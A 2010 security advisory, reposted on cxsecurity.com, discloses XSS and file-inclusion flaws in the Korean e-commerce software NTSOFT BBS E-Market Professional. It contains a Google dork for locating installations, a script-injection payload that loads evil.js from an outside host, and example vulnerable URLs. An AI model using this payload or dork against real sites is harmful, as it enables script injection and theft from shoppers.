NTSOFT BBS E-Market Professional XSS and Remote Code Execution

2010-07-04 / 2010-07-05
Credit: Ivan Sanchez
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

+============================+ + NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil code + +============================+ Author(s): Ivan Sanchez Product: NTSOFT, All Right Reserved. Vendor Overview: NTSOFT. (Korean ecommerce application) Vendor Homepage: http://www.nt.co.kr/ Date: 03/07/2010 "most off all korean sites that handle e-shop , e-banking,... use this software" Description: ------------ BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP. BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The issue presents itself due to improper validation of user-supplied data. During 2009, I reported some bugs: ---------------------------------- http://www.packetstormsecurity.org/0907-exploits/ntsoft-xss.txt http://www.securityfocus.com/bid/35893 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3152 http://xforce.iss.net/xforce/xfdb/52157 http://secunia.com/advisories/26117 http://www.juniper.net/security/auto/vulnerabilities/vuln35893.html GOOGLE DORKS: ------------ intext: "NTSOFT All rights reserved" Parameters affected: ------------------- 2010: pageurl= evil.js co_no= evil.js b_temcode= evil.js 2009: page= evil.js bt_code= evil.js b_no= evil.js Evil Code to put: ----------------- Example: "><script src=http://site/scripts/evil.js></script> Example URl affected: --------------------- 2009: http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code 2010: http://TARGET/becommunity/community/index.php?pageurl= EVIL_CODE http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=93809&b_no=434&bt_code=17&page=1&flg=3&co_no=EVIL_CODE http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=19&page=7&flg=EVIL_CODE &co_no=105580 http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=EVIL_CODEE&page=7&flg=3&co_no=105580 Thank you so Much! Ivan, NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! +============================+ + NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil code + +============================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top